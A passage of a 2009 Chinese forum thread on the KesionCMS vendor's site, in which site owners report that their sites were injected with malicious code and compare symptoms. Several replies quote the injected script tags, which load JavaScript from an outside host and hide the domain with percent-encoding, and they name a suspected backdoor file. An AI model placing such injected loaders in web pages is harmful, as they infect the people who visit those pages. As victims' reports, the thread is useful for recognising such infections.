账号通
    

注册

找回密码

账号  

密码  

话题
互动
会员
服务
<<返回列表上一个主题 下一个主题 打印本帖 复制本帖地址

34737

查看

85

回复
主题:[公告]郑重声明:挂马者及被挂马的用户注意了 [收藏主题] 转到:  
天下无语 当前离线

1259

主题

11

广播

1

粉丝
添加关注
级别:九年级

用户积分:9743 分
登录次数:1540 次
注册时间:2007/4/1
最后登录:2024/1/8
天下无语 发表于:2009/10/1 19:28:00   | 只看该作者 查看该作者主题 21楼 
科汛在线商城系统(NET)
做官网 就用科汛智能建站系统!
我的ks_data admin目录均有一个index.asp文件,且不能删除
 
做考试题库 就用#科汛在线考试系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
iewl 当前离线

178

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:898 分
登录次数:101 次
注册时间:2007/12/19
最后登录:2022/11/16
iewl 发表于:2009/10/1 19:10:00   | 只看该作者 查看该作者主题 22楼 
做在线知识付费 选科汛云开店
有课程 找生源 就上科汛课堂街

我的也中了 刚传上网站三天
 
科汛商学院助您快速入门
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
雯曦 当前离线

29

主题

1

广播

0

粉丝
添加关注
级别:学前班

用户积分:558 分
登录次数:37 次
注册时间:2008/10/12
最后登录:2013/12/27
雯曦 发表于:2009/10/5 22:14:00   | 只看该作者 查看该作者主题 23楼 
科汛在线网校系统
一分钟快速开通线上知识店铺
强烈支持科讯报警
 
科汛商学院助您快速入门
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
janyao 当前离线

379

主题

14

广播

1

粉丝
添加关注
级别:三年级

用户积分:2317 分
登录次数:131 次
注册时间:2009/4/1
最后登录:2017/3/2
janyao 发表于:2009/10/2 13:45:00   | 只看该作者 查看该作者主题 24楼 
科汛在线考试系统(NET)
有课程 找生源 就上科汛课堂街

从有的使用者反映来看,说刚上传程序就被挂,说明挂马者是利用使用者与科讯之间的通讯来检测的,所以估计是第二种猜测,

另外我发现了挂马后台程序KS_Editor/fckeditor/中的fckeditr.asp文件,大家看看是不是和我一样的。
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
86dragon 当前离线

15

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:313 分
登录次数:22 次
注册时间:2006/9/25
最后登录:2009/11/16
86dragon 发表于:2009/10/2 15:38:00   | 只看该作者 查看该作者主题 25楼 
做考试题库 就用#科汛在线考试系统!
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
lshzh721 当前离线

88

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:2514 分
登录次数:193 次
注册时间:2009/6/10
最后登录:2021/9/14
lshzh721 发表于:2009/10/1 23:03:00   | 只看该作者 查看该作者主题 26楼 
科汛智能建站系统
一分钟快速开通线上知识店铺
为何只有静态网页有<script language="JavaScript" src="http://pt92%38.9966.org" type="text/javascript" id="scr7ipt1549"  ></script>代码??
 
做考试题库 就用#科汛在线考试系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
qiubin100 当前离线

31

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:159 分
登录次数:12 次
注册时间:2009/9/4
最后登录:2013/5/31
qiubin100 发表于:2009/10/1 18:57:00   | 只看该作者 查看该作者主题 27楼 
科汛在线考试系统(NET)
有课程 找生源 就上科汛课堂街

怎么会这样啊?!郁闷
 
做考试题库 就用#科汛在线考试系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
huiten 当前离线

83

主题

12

广播

0

粉丝
添加关注
级别:学前班

用户积分:754 分
登录次数:269 次
注册时间:2009/7/26
最后登录:2024/3/30
huiten 发表于:2009/10/1 18:25:00   | 只看该作者 查看该作者主题 28楼 
科汛在线考试系统(NET)
做官网 就用科汛智能建站系统!

这是怎么回事啊,我怎么也找不到这个文件所在位置

 

另外,以下是我的网页中出现的恶意代码

 

在JS文件中,很多的

document.writeln('<script language="JavaScript" src="http://pt928.9966.%6Frg" type="text/javascript" id="scr7ipt6392"  ><\/script>');

 

 

以下是的在index.asp和html文件中出现的
<script src="/ks_inc/ajax.js"></script>
<!-- published at 2009-9-26 22:29:57 publish by KesionCMS V5.5 -->

 

<script src="http://pt928%2E9966%2Eorg" type="text/javascript" language="JavaScript" id="scr7ipt7197"  ></script>

 

 


<script language="Javascript" type="text/javascript">
<!--
   var gUrl = location.search;
   gUrl = gUrl.substr(gUrl.indexOf('?')+1);
   document.getElementById('main').src=(gUrl=='')?'User_Main.asp':gUrl;
//-->
</script>


<script id="scr7ipt3102" type="text/javascript" src="http://pt928.9966.%6Frg" language="JavaScript"  ></script>

 

这是些东西
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
huiten 当前离线

83

主题

12

广播

0

粉丝
添加关注
级别:学前班

用户积分:754 分
登录次数:269 次
注册时间:2009/7/26
最后登录:2024/3/30
huiten 发表于:2009/10/1 18:22:00   | 只看该作者 查看该作者主题 29楼 
科汛在线考试系统(NET)
做官网 就用科汛智能建站系统!
DownLoad\inedx.asp Execute execute()函数可以执行任意ASP代码,被一些后门利用。其形式一般是:execute(X)。

 

这是我挂马后的,检测时发现的问题
 
一分钟快速开通线上知识店铺
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
桥右京 当前离线

76

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:1068 分
登录次数:62 次
注册时间:2008/6/30
最后登录:2010/5/27
桥右京 发表于:2009/10/1 14:14:00   | 只看该作者 查看该作者主题 30楼 
科汛在线网校系统
做线上考试培训 就选#科汛网校
5.03版的admin/ks.update.asp文件在哪里。没找到。
 
做考试题库 就用#科汛在线考试系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
<< 返回列表
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21997秒 powered by KesionCMS 9.0